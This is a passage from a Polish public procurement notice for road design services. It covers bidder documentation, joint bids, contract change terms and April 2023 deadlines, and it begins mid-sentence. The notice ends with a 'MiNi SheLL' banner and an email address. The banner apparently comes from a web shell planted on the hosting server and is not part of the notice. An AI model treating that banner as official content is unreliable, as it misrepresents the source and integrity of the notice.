3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; zgodnie ze wzorem stanowiącym załącznik nr 5 do SWZ; <br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa powyżej, dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia wystarczy, iż ww. warunek spełni ten z wykonawców wspólnie ubiegających się o udzielenie zamówienia, który wykona usługę, do realizacji której ta zdolność jest wymagana. <br/>2.	Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za wykonanie prac projektowych, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; zgodnie ze wzorem stanowiącym załącznik nr 6 do SWZ; <br/>W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wystarczy, iż ww. warunek spełni ten z wykonawców wspólnie ubiegających się o udzielenie zamówienia, który dysponuje osobą o uprawnieniach wymaganych do realizacji usługi.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Ofertę należy sporządzić zgodnie z Formularzem oferty stanowiącym załącznik nr 1 do SWZ.<br/>2.	Dokumenty i oświadczenia, które wykonawca jest zobowiązany dołączyć do oferty:<br/>2.1.	Na wykazanie spełniania warunków udziału w postępowaniu Wykonawca składa wstępne oświadczenie dotyczące spełnienia warunków udziału w postępowaniu, na podstawie art. 125 ust. 1 ustawy PZP, zgodnie z treścią załącznika nr 2 do SWZ.<br/>2.2.	Dla wykazania niepodlegania wykluczeniu z postępowania Wykonawca składa wstępne oświadczenie dotyczące braku podstaw wykluczenia z postępowania, na podstawie art. 125 ust. 1 ustawy PZP, zgodnie z treścią załącznika nr 3 do SWZ.<br/>2.3.	Zobowiązanie innych podmiotów, gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 ustawy PZP.<br/>3.	Dokumenty, jakie Wykonawca również musi dołączyć do oferty:<br/>3.1.	Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy lub pełnomocnictwo. <br/>3.2. Dokument (np. protokół przekazania, protokół odbioru, kopia umowy itp.) wykazujący, że osoba wskazana jako projektant branży drogowej wyznaczona do realizacji zamówienia rzeczywiście pełniła tego rodzaju funkcję odnośnie do usług wykazanych w załączniku nr 1 „Oferta”, jak również fakt, iż usługi te zostały wykonane należycie.<br/>3.3.	Oświadczenie o którym mowa w art. 117 ust. 4 PZP – oświadczenie dotyczy wyłącznie wykonawców wspólnie składających ofertę (załącznik nr 4 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2. Ofertę należy podpisać w taki sposób, aby wynikało z niej jednoznacznie oświadczenie woli zawarcia umowy przez wszystkich Wykonawców występujących wspólnie (przez każdego z wykonawców lub pełnomocnika).<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>4. W przypadku, o którym mowa w pkt 2. i 3. powyżej, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 4 do SWZ.<br/>5. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Lp.	Rodzaj i zakres zmiany	- Warunki wprowadzenia zmiany<br/>I. ZMIANY OGÓLNE<br/>1.	Zmiana adresu/(nazwy) firmy/siedziby Zamawiającego/Wykonawcy/Podwykonawcy	- pismo zawiadamiające o zmianach, nie wymaga zawarcia aneksu do umowy<br/>2.	przekształcenie wykonawcy nie prowadzące do zmiany wykonawcy za wyjątkiem wypadków dozwolonych przepisami prawa powszechnie obowiązującego	-zmianie podlegać będzie oznaczenie wykonawcy wskutek przekształcenia <br/>3.	zmiana osób uczestniczących w wykonaniu zamówienia pod warunkiem, że osoby te będą spełniały wymagania określone w SWZ -zawarcie aneksu do umowy uwzględniającego dokonanie zmian<br/>4.	powierzenie części zamówienia podwykonawcy, podanie nazwy albo imion i nazwisk oraz danych kontaktowych podwykonawców i osób do kontaktu z nimi, zmiana podwykonawcy lub rezygnacja z podwykonawcy, wprowadzenie nowego podwykonawcy w zakresie nieprzewidzianym w formularzu oferty, zmiana nazwy albo imion i nazwisk oraz danych kontaktowych podwykonawców i osób do kontaktu z nimi, zmiana zakresu robót powierzonych podwykonawcy -zmiana umowy poprzez określenie w umowie podwykonawcy, nazwy albo imion i nazwisk oraz danych kontaktowych podwykonawców i osób do kontaktu z nimi oraz zakresu robót, które wykonawca będzie wykonywał osobiście oraz za pomocą podwykonawców, zmiana podwykonawcy, któremu wykonawca powierzył realizację części zamówienia, zmiana nazwy albo imion i nazwisk oraz danych kontaktowych podwykonawców i osób do kontaktu z nimi, zmiana zakresu robót, które wykonawca będzie wykonywał za pomocą podwykonawców. W przypadku gdy dotychczasowy podwykonawca swoimi zasobami potwierdzał spełnienie przez Wykonawcę warunków udziału w postępowaniu nowy podwykonawca lub Wykonawca samodzielnie musi spełniać warunki udziału w postępowaniu w takim samym zakresie jak dotychczasowy podwykonawca tj. pozwalający spełnić warunki podane w SWZ<br/>II. ZMIANA PRZEDMIOTU I TERMINU WYKONANIA ZAMÓWIENIA<br/>1.	wydłużenie terminu załatwienia sprawy w postępowaniu administracyjnym lub innym postępowaniu prowadzonym w związku z zamówieniem z przyczyn, za które wykonawca nie odpowiada, w tym z następujących przyczyn: <br/>- brak wydania uzgodnienia w terminie do 30 dni od daty wystąpienia Wykonawcy o wydanie stosownego dokumentu niezbędnego do należytego wykonania umowy, mimo że wniosek Wykonawcy spełniał wszelkie warunki formalne i Wykonawca wykazał się należytą starannością w procesie uzyskania uzgodnienia <br/>- konieczność uzyskania wyroku sądu lub innego orzeczenia sądu albo organu administracji publicznej, którego nie przewidywano przy zawieraniu umowy -zmiana umowy w zakresie wydłużenia terminu wykonania zamówienia o czas postępowania administracyjnego lub innego postępowania<br/>2.	postępowanie administracyjne w sprawie zgody na odstępstwo od przepisów techniczno – budowlanych -zmiana umowy w zakresie wydłużenia terminu wykonania zamówienia o czas postępowania administracyjnego w sprawie zgody na odstępstwo od przepisów techniczno – budowlanych, licząc od dnia złożenia kompletnego wniosku do dnia wydania ostatecznego rozstrzygnięcia w sprawie zgody na odstępstwo od przepisów techniczno – budowlanych<br/>3.	zmiana w dokumentacji projektowej z inicjatywy Zamawiającego -zmiana umowy w zakresie przedmiotu zamówienia oraz wydłużenie terminu wykonania umowy o czas niezbędny na wprowadzenie zmiany, w granicach umówionego wynagrodzenia<br/>4.	zmiana w dokumentacji projektowej z powodu braku zgody osoby trzeciej na dysponowanie nieruchomością na cele budowlane -zmiana umowy w zakresie przedmiotu zamówienia oraz wydłużenie terminu wykonania umowy o czas potrzebny na wprowadzenie zmiany pod warunkiem zachowania przez wykonawcę wynikających z umowy obowiązków w zakresie otrzymania zgody osoby trzeciej na dysponowanie nieruchomością na cele budowlane, w granicach umówionego wynagrodzenia<br/>c.d. w sekcji IX <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzd-wodzislaw.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-28 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) c.d. sekcji 7.4 Lp. Rodzaj i zakres zmiany Warunki wprowadzenia zmiany 5. przyczyny niezależne od Stron, których nie<br/>można było przewidzieć ani uniknąć, ani im zapobiec przy zachowaniu należytej staranności, w tym:<br/>- protesty mieszkańców lub innych podmiotów powodujące wstrzymanie prac projektowych,<br/>- nieuregulowany stan prawny nieruchomości, przez które będzie przebiegać projektowana inwestycja, śmierć właściciela<br/>nieruchomości w toku wykonywania umowy przy jednoczesnym braku stwierdzenia nabycia spadku przez spadkobierców<br/>lub brak spadkobierców,<br/>- treść uzgodnień z właścicielami sieci uzbrojenia terenu, zarządcami innych dróg publicznych, zarządcami terenów<br/>zamkniętych w rozumieniu właściwych przepisów, organami administracji publicznej, właścicielami nieruchomości, przez<br/>które będzie przebiegać projektowana inwestycja lub innymi podmiotami skutkująca koniecznością wprowadzenia zmian w<br/>treści dokumentacji projektowej -zmiana umowy w zakresie przedmiotu zamówienia oraz wydłużenie terminu wykonania<br/>zamówienia o czas potrzebny na wprowadzenie zmiany<br/>6. wystąpienie szczególnych trudności w pozyskiwaniu przez Wykonawcę materiałów wyjściowych niezbędnych do<br/>wykonania Umowy, których nie można było przewidzieć przy dołożeniu należytej staranności przed zawarciem Umowy. O<br/>zaistnieniu takich okoliczności Wykonawca zobowiązany jest powiadomić Zamawiającego w terminie 3 dni roboczych od<br/>powzięcia informacji o ich wystąpieniu, pod rygorem utraty prawa do powoływania się na tę okoliczność. Wykonawca<br/>zobowiązany jest wraz z wnioskiem o zmianę terminu realizacji Umowy przedłożyć dowody wykazujące wystąpienie<br/>niniejszej przesłanki, wskazując długość trwania oraz czynności podejmowane przez Wykonawcę w celu jej usunięcia<br/> -zmiana umowy w zakresie wydłużenia terminu wykonania zamówienia o ilość dni, w których z przyczyn niezawinionych<br/>przez Wykonawcę nie było możliwe pozyskanie dokumentów, a których brak uniemożliwiał prowadzenie jakichkolwiek prac<br/>związanych z wykonaniem Umowy;<br/>7. zmiany przepisów prawa w zakresie, w jakim mają one bezpośredni wpływ na wykonanie Umowy -zmiana umowy w<br/>zakresie wydłużenia terminu wykonania zamówienia o ilość dni niezbędnych do wykonania Umowy zgodnie ze zmienionymi<br/>przepisami;<br/>III. ZMIANA WYNAGRODZENIA<br/>1. zmiana: stawki podatku od towarów i usług, podatku akcyzowego, wysokości minimalnego wynagrodzenia za pracę<br/>ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, zasad<br/>podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia<br/>społeczne lub zdrowotne lub zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa<br/>w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych -waloryzacja wynagrodzenia wykonawcy,<br/>jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę, w sposób oraz na warunkach<br/>szczegółowo określonych w projektowanych postanowieniach umowy (zawartej umowie)<br/>2. zmiana wysokości wynagrodzenia Wykonawcy, gdy minimalny poziom zmiany cen materiałów lub kosztów, uprawniający<br/>strony umowy do żądania zmiany wynagrodzenia wyniesie co najmniej 5 % w stosunku do cen lub kosztów z miesiąca, w<br/>którym Wykonawca złożył ofertę - waloryzacja wynagrodzenia wykonawcy w sposób oraz na warunkach szczegółowo<br/>określonych w projektowanych postanowieniach umowy (zawartej umowie)<br/>2) Wymagania w zakresie elektromobilności szczegółowo określone w SWZ.<br/>3) Dodatkowa przesłanka wykluczenia wykonawcy - dział XV pkt 1.3 SWZ<br/>4) Termin wykonania dokumentacji projektowej: 22 miesięcy od dnia zawarcia umowy, z zastrzeżeniem, iż w terminie do 5<br/>miesięcy od dnia zawarcia umowy, Wykonawca złoży 1 egzemplarz projektu wstępnego.

Creat By MiNi SheLL
Email: jattceo@gmail.com